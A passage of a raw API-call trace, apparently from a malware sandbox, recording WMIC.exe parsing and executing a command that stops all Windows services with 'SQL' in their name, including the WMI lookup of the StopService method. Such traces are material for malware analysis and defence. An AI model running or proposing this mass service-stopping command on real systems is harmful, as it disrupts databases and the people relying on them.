[0285.411] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.411] malloc (_Size=0xc) returned 0x2daac78 [0285.411] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.411] free (_Block=0x2daac78) [0285.411] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0285.411] malloc (_Size=0xc) returned 0x2daab88 [0285.412] malloc (_Size=0xc) returned 0x2daab58 [0285.412] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0285.412] SysStringLen (param_1="TABLE") returned 0x5 [0285.412] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0285.412] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.412] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0285.412] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.412] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0285.412] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0285.412] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0285.412] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0285.412] malloc (_Size=0x18) returned 0x2da2b70 [0285.412] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.412] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.412] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.412] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=20, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.412] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="textvaluelist.xsl") returned 0x0 [0285.412] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.412] malloc (_Size=0xc) returned 0x2daac78 [0285.413] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.413] free (_Block=0x2daac78) [0285.413] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0285.413] malloc (_Size=0xc) returned 0x2daac78 [0285.413] malloc (_Size=0xc) returned 0x2daac90 [0285.413] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0285.413] SysStringLen (param_1="TABLE") returned 0x5 [0285.413] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0285.413] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.413] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0285.413] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.413] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0285.413] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0285.413] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0285.413] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0285.413] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0285.413] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0285.413] malloc (_Size=0x18) returned 0x2da2bb0 [0285.413] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.414] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.414] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.414] IUnknown:Release (This=0x2cd9ca0) returned 0x0 [0285.414] FreeThreadedDOMDocument:IUnknown:Release (This=0x2cd6b48) returned 0x1 [0285.414] FreeThreadedDOMDocument:IUnknown:Release (This=0x2cd45a8) returned 0x0 [0285.414] free (_Block=0x2da9928) [0285.414] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQL%%'\" call stopservice" [0285.414] malloc (_Size=0xd0) returned 0x2daaee8 [0285.414] memcpy_s (in: _Destination=0x2daaee8, _DestinationSize=0xce, _Source=0x2b01b78, _SourceSize=0xc6 | out: _Destination=0x2daaee8) returned 0x0 [0285.414] malloc (_Size=0xc) returned 0x2daad50 [0285.414] malloc (_Size=0xc) returned 0x2daacc0 [0285.414] malloc (_Size=0xc) returned 0x2daadb0 [0285.414] malloc (_Size=0xc) returned 0x2daade0 [0285.414] malloc (_Size=0x80) returned 0x2daafc0 [0285.414] GetLocalTime (in: lpSystemTime=0x87fb84 | out: lpSystemTime=0x87fb84*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1c, wSecond=0x33, wMilliseconds=0x1c9)) [0285.415] _vsnwprintf (in: _Buffer=0x2daafc0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x87fb64 | out: _Buffer="04-02-2020T08:28:51") returned 19 [0285.415] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.415] malloc (_Size=0x82) returned 0x2dab048 [0285.415] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.415] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.415] malloc (_Size=0x82) returned 0x2dabcd0 [0285.415] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.415] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.415] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.415] malloc (_Size=0xa) returned 0x2daacd8 [0285.415] lstrlenW (lpString="path") returned 4 [0285.415] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0285.415] malloc (_Size=0xa) returned 0x2daad80 [0285.415] malloc (_Size=0x4) returned 0x2da2ed8 [0285.415] free (_Block=0x0) [0285.415] free (_Block=0x2daacd8) [0285.415] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.415] malloc (_Size=0x1c) returned 0x2da9da8 [0285.415] lstrlenW (lpString="Win32_Service") returned 13 [0285.415] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0285.415] malloc (_Size=0x1c) returned 0x2da0568 [0285.415] malloc (_Size=0x8) returned 0x2da2ee8 [0285.416] memmove_s (in: _Destination=0x2da2ee8, _DestinationSize=0x4, _Source=0x2da2ed8, _SourceSize=0x4 | out: _Destination=0x2da2ee8) returned 0x0 [0285.416] free (_Block=0x2da2ed8) [0285.416] free (_Block=0x0) [0285.416] free (_Block=0x2da9da8) [0285.416] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.416] malloc (_Size=0xc) returned 0x2daacd8 [0285.416] lstrlenW (lpString="where") returned 5 [0285.416] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0285.416] malloc (_Size=0xc) returned 0x2daad08 [0285.416] malloc (_Size=0xc) returned 0x2daad68 [0285.416] memmove_s (in: _Destination=0x2daad68, _DestinationSize=0x8, _Source=0x2da2ee8, _SourceSize=0x8 | out: _Destination=0x2daad68) returned 0x0 [0285.416] free (_Block=0x2da2ee8) [0285.416] free (_Block=0x0) [0285.416] free (_Block=0x2daacd8) [0285.416] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.416] malloc (_Size=0x2c) returned 0x2dac0e0 [0285.416] lstrlenW (lpString="\"name like '%%SQL%%'\"") returned 21 [0285.416] _wcsicmp (_String1="\"name like '%%SQL%%'\"", _String2="\"NULL\"") returned -20 [0285.416] lstrlenW (lpString="\"name like '%%SQL%%'\"") returned 21 [0285.416] lstrlenW (lpString="\"name like '%%SQL%%'\"") returned 21 [0285.416] malloc (_Size=0x2c) returned 0x2dac118 [0285.416] malloc (_Size=0x10) returned 0x2daab28 [0285.416] memmove_s (in: _Destination=0x2daab28, _DestinationSize=0xc, _Source=0x2daad68, _SourceSize=0xc | out: _Destination=0x2daab28) returned 0x0 [0285.416] free (_Block=0x2daad68) [0285.416] free (_Block=0x0) [0285.416] free (_Block=0x2dac0e0) [0285.416] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.416] malloc (_Size=0xa) returned 0x2daacd8 [0285.426] lstrlenW (lpString="call") returned 4 [0285.426] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0285.426] malloc (_Size=0xa) returned 0x2daad68 [0285.426] malloc (_Size=0x18) returned 0x2da29d0 [0285.426] memmove_s (in: _Destination=0x2da29d0, _DestinationSize=0x10, _Source=0x2daab28, _SourceSize=0x10 | out: _Destination=0x2da29d0) returned 0x0 [0285.426] free (_Block=0x2daab28) [0285.427] free (_Block=0x0) [0285.427] free (_Block=0x2daacd8) [0285.427] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQL%%'\" call stopservice") returned 64 [0285.427] malloc (_Size=0x18) returned 0x2da2c50 [0285.427] lstrlenW (lpString="stopservice") returned 11 [0285.427] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0285.427] malloc (_Size=0x18) returned 0x2da29f0 [0285.427] free (_Block=0x0) [0285.427] free (_Block=0x2da2c50) [0285.427] malloc (_Size=0x18) returned 0x2da2c50 [0285.427] lstrlenW (lpString="QUIT") returned 4 [0285.427] lstrlenW (lpString="path") returned 4 [0285.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0285.427] lstrlenW (lpString="EXIT") returned 4 [0285.427] lstrlenW (lpString="path") returned 4 [0285.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0285.427] free (_Block=0x2da2c50) [0285.427] WbemLocator:IUnknown:AddRef (This=0x2b147f8) returned 0x2 [0285.427] malloc (_Size=0x18) returned 0x2da2a10 [0285.427] lstrlenW (lpString="/") returned 1 [0285.427] lstrlenW (lpString="path") returned 4 [0285.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0285.427] lstrlenW (lpString="-") returned 1 [0285.428] lstrlenW (lpString="path") returned 4 [0285.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0285.428] lstrlenW (lpString="CLASS") returned 5 [0285.428] lstrlenW (lpString="path") returned 4 [0285.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0285.428] lstrlenW (lpString="PATH") returned 4 [0285.428] lstrlenW (lpString="path") returned 4 [0285.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0285.428] lstrlenW (lpString="/") returned 1 [0285.428] lstrlenW (lpString="Win32_Service") returned 13 [0285.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0285.428] lstrlenW (lpString="-") returned 1 [0285.428] lstrlenW (lpString="Win32_Service") returned 13 [0285.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0285.428] lstrlenW (lpString="Win32_Service") returned 13 [0285.428] malloc (_Size=0x1c) returned 0x2da9da8 [0285.428] lstrlenW (lpString="Win32_Service") returned 13 [0285.429] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x5e6d193e | out: _String="Win32_Service", _Context=0x5e6d193e) returned="Win32_Service" [0285.429] lstrlenW (lpString="Win32_Service") returned 13 [0285.429] malloc (_Size=0x1c) returned 0x2dac0e0 [0285.429] lstrlenW (lpString="Win32_Service") returned 13 [0285.429] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x5e6d193e | out: _String=0x0, _Context=0x5e6d193e) returned 0x0 [0285.429] lstrlenW (lpString="") returned 0 [0285.429] lstrlenW (lpString="WHERE") returned 5 [0285.429] lstrlenW (lpString="where") returned 5 [0285.429] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0285.429] lstrlenW (lpString="/") returned 1 [0285.429] lstrlenW (lpString="name like '%%SQL%%'") returned 19 [0285.429] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQL%%'", cchCount1=19, lpString2="/", cchCount2=1) returned 3 [0285.429] lstrlenW (lpString="-") returned 1 [0285.429] lstrlenW (lpString="name like '%%SQL%%'") returned 19 [0285.429] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQL%%'", cchCount1=19, lpString2="-", cchCount2=1) returned 3 [0285.429] lstrlenW (lpString="name like '%%SQL%%'") returned 19 [0285.429] malloc (_Size=0x28) returned 0x2dac150 [0285.429] lstrlenW (lpString="name like '%%SQL%%'") returned 19 [0285.429] lstrlenW (lpString="/") returned 1 [0285.429] lstrlenW (lpString="call") returned 4 [0285.429] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0285.430] lstrlenW (lpString="-") returned 1 [0285.430] lstrlenW (lpString="call") returned 4 [0285.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0285.430] lstrlenW (lpString="call") returned 4 [0285.430] malloc (_Size=0xa) returned 0x2daacd8 [0285.430] lstrlenW (lpString="call") returned 4 [0285.430] lstrlenW (lpString="GET") returned 3 [0285.430] lstrlenW (lpString="call") returned 4 [0285.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0285.430] lstrlenW (lpString="LIST") returned 4 [0285.430] lstrlenW (lpString="call") returned 4 [0285.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0285.430] lstrlenW (lpString="SET") returned 3 [0285.430] lstrlenW (lpString="call") returned 4 [0285.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0285.430] lstrlenW (lpString="CREATE") returned 6 [0285.430] lstrlenW (lpString="call") returned 4 [0285.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0285.430] lstrlenW (lpString="CALL") returned 4 [0285.430] lstrlenW (lpString="call") returned 4 [0285.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0285.430] lstrlenW (lpString="/") returned 1 [0285.430] lstrlenW (lpString="stopservice") returned 11 [0285.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0285.430] lstrlenW (lpString="-") returned 1 [0285.430] lstrlenW (lpString="stopservice") returned 11 [0285.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0285.430] lstrlenW (lpString="stopservice") returned 11 [0285.430] malloc (_Size=0x18) returned 0x2da2a30 [0285.431] lstrlenW (lpString="stopservice") returned 11 [0285.431] ??0CHString@@QAE@XZ () returned 0x87da4c [0285.431] GetCurrentThreadId () returned 0x4e4 [0285.431] GetCurrentThreadId () returned 0x4e4 [0285.431] ??0CHString@@QAE@XZ () returned 0x87d9d4 [0285.431] malloc (_Size=0x4) returned 0x2dac108 [0285.431] malloc (_Size=0xc) returned 0x2daab28 [0285.431] malloc (_Size=0xc) returned 0x2daae88 [0285.431] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2b147f8, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x2b1aa38) returned 0x0 [0285.485] free (_Block=0x2daae88) [0285.485] CoSetProxyBlanket (pProxy=0x2b1aa38, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0285.486] free (_Block=0x2dac108) [0285.486] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0285.486] free (_Block=0x2daab28) [0285.486] malloc (_Size=0xc) returned 0x2daab28 [0285.486] IWbemServices:GetObject (in: This=0x2b1aa38, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x87da64*=0x0, ppCallResult=0x0 | out: ppObject=0x87da64*=0x2b70380, ppCallResult=0x0) returned 0x0 [0285.557] free (_Block=0x2daab28) [0285.557] IWbemClassObject:BeginMethodEnumeration (This=0x2b70380, lEnumFlags=0) returned 0x0 [0285.557] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="StartService", ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x2b70578) returned 0x0 [0285.558] lstrlenW (lpString="StartService") returned 12 [0285.558] lstrlenW (lpString="stopservice") returned 11 [0285.558] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0285.558] IUnknown:Release (This=0x2b70578) returned 0x0 [0285.558] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="StopService", ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x2b70578) returned 0x0 [0285.558] lstrlenW (lpString="StopService") returned 11 [0285.558] lstrlenW (lpString="stopservice") returned 11 [0285.558] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0285.558] malloc (_Size=0x38) returned 0x2dac8f0 [0285.559] ??0CHString@@QAE@XZ () returned 0x87d5b4 [0285.559] GetCurrentThreadId () returned 0x4e4 [0285.559] IWbemClassObject:GetNames (in: This=0x2b70578, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x87d5c4 | out: pNames=0x87d5c4*="\x01ƀ\x04") returned 0x0 [0285.559] SafeArrayGetLBound (in: psa=0x2b70b40, nDim=0x1, plLbound=0x87d5b0 | out: plLbound=0x87d5b0) returned 0x0 [0285.559] SafeArrayGetUBound (in: psa=0x2b70b40, nDim=0x1, plUbound=0x87d5ac | out: plUbound=0x87d5ac) returned 0x0 [0285.559] SafeArrayGetElement (in: psa=0x2b70b40, rgIndices=0x87d5b8, pv=0x87d5c8 | out: pv=0x87d5c8) returned 0x0 [0285.559] malloc (_Size=0x24) returned 0x2dac930 [0285.560] IWbemClassObject:GetPropertyQualifierSet (in: This=0x2b70578, wszProperty="ReturnValue", ppQualSet=0x87d4d8 | out: ppQualSet=0x87d4d8*=0x2b1aef8) returned 0x0 [0285.560] malloc (_Size=0xc) returned 0x2daab28 [0285.560] IWbemQualifierSet:Get (in: This=0x2b1aef8, wszName="CIMTYPE", lFlags=0, pVal=0x87d4a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x87d4a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0285.560] free (_Block=0x2daab28) [0285.560] malloc (_Size=0xc) returned 0x2daab28 [0285.560] IWbemClassObject:Get (in: This=0x2b70578, wszName="ReturnValue", lFlags=0, pVal=0x87d480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x87d4bc*=8901796, plFlavor=0x0 | out: pVal=0x87d480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x87d4bc*=19, plFlavor=0x0) returned 0x0 [0285.561] malloc (_Size=0xc) returned 0x2daae10 [0285.561] IWbemQualifierSet:Get (in: This=0x2b1aef8, wszName="read", lFlags=0, pVal=0x87d4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x87d4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0285.561] free (_Block=0x2daae10) [0285.561] malloc (_Size=0xc) returned 0x2daaed0 [0285.561] IWbemQualifierSet:Get (in: This=0x2b1aef8, wszName="write", lFlags=0, pVal=0x87d4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x87d4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0285.561] free (_Block=0x2daaed0) [0285.561] malloc (_Size=0xc) returned 0x2daaed0 [0285.561] malloc (_Size=0xc) returned 0x2daae10 [0285.561] IWbemQualifierSet:Get (in: This=0x2b1aef8, wszName="Description", lFlags=0, pVal=0x87d498*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x87d498*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0285.561] free (_Block=0x2daae10) [0285.561] malloc (_Size=0xc) returned 0x2daaea0 [0285.561] lstrlenA (lpString="Not Available") returned 13 [0285.561] malloc (_Size=0x1c) returned 0x2dac960 [0285.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x2dac960, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0285.562] free (_Block=0x2dac960) [0285.562] IUnknown:Release (This=0x2b1aef8) returned 0x0 [0285.562] malloc (_Size=0x24) returned 0x2dac960 [0285.562] malloc (_Size=0xc) returned 0x2daae10 [0285.562] malloc (_Size=0x24) returned 0x2dac990 [0285.562] malloc (_Size=0x38) returned 0x2dac9c0 [0285.562] malloc (_Size=0x24) returned 0x2daca00 [0285.562] free (_Block=0x2dac990) [0285.562] free (_Block=0x2dac960) [0285.562] free (_Block=0x2dac930) [0285.562] free (_Block=0x2daaed0) [0285.562] free (_Block=0x2daaea0) [0285.562] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0285.562] IWbemClassObject:GetMethodQualifierSet (in: This=0x2b70380, wszMethod="StopService", ppQualSet=0x87d9cc | out: ppQualSet=0x87d9cc*=0x2b443c8) returned 0x0 [0285.563] malloc (_Size=0xc) returned 0x2daaeb8 [0285.563] IWbemQualifierSet:Get (in: This=0x2b443c8, wszName="Implemented", lFlags=0, pVal=0x87d9b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x87d9b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0285.563] free (_Block=0x2daaeb8) [0285.563] malloc (_Size=0xc) returned 0x2daae88 [0285.563] malloc (_Size=0xc) returned 0x2daaed0 [0285.563] IWbemQualifierSet:Get (in: This=0x2b443c8, wszName="Description", lFlags=0, pVal=0x87d9a4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x87d9a4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0285.564] free (_Block=0x2daaed0) [0285.564] malloc (_Size=0xc) returned 0x2daae40 [0285.564] IUnknown:Release (This=0x2b443c8) returned 0x0 [0285.564] malloc (_Size=0x38) returned 0x2dac930 [0285.564] malloc (_Size=0x38) returned 0x2dac970 [0285.564] malloc (_Size=0x24) returned 0x2daca30 [0285.564] malloc (_Size=0xc) returned 0x2daae28 [0285.564] malloc (_Size=0x38) returned 0x2daca60 [0285.564] malloc (_Size=0x38) returned 0x2dacaa0 [0285.564] malloc (_Size=0x24) returned 0x2dacae0 [0285.564] malloc (_Size=0x28) returned 0x2dacb10 [0285.564] malloc (_Size=0x38) returned 0x2dacb40 [0285.564] malloc (_Size=0x38) returned 0x2dacb80 [0285.564] malloc (_Size=0x24) returned 0x2dacbc0 [0285.564] free (_Block=0x2dacae0) [0285.564] free (_Block=0x2dacaa0) [0285.564] free (_Block=0x2daca60) [0285.564] free (_Block=0x2daca30) [0285.564] free (_Block=0x2dac970) [0285.564] free (_Block=0x2dac930) [0285.564] IUnknown:Release (This=0x2b70578) returned 0x0 [0285.565] free (_Block=0x2daca00) [0285.565] free (_Block=0x2dac9c0) [0285.565] free (_Block=0x2dac8f0) [0285.565] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="PauseService", ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x2b46c80) returned 0x0 [0285.565] lstrlenW (lpString="PauseService") returned 12 [0285.565] lstrlenW (lpString="stopservice") returned 11 [0285.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0285.565] IUnknown:Release (This=0x2b46c80) returned 0x0 [0285.565] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="ResumeService", ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x2b46c80) returned 0x0 [0285.565] lstrlenW (lpString="ResumeService") returned 13 [0285.565] lstrlenW (lpString="stopservice") returned 11 [0285.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0285.565] IUnknown:Release (This=0x2b46c80) returned 0x0 [0285.565] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="InterrogateService", ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x2b46c80) returned 0x0 [0285.565] lstrlenW (lpString="InterrogateService") returned 18 [0285.565] lstrlenW (lpString="stopservice") returned 11 [0285.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0285.565] IUnknown:Release (This=0x2b46c80) returned 0x0 [0285.566] IWbemClassObject:NextMethod (in: This=0x2b70380, lFlags=0, pstrName=0x87da70*=0x0, ppInSignature=0x87da6c*=0x0, ppOutSignature=0x87da68*=0x0 | out: pstrName=0x87da70*="UserControlService", 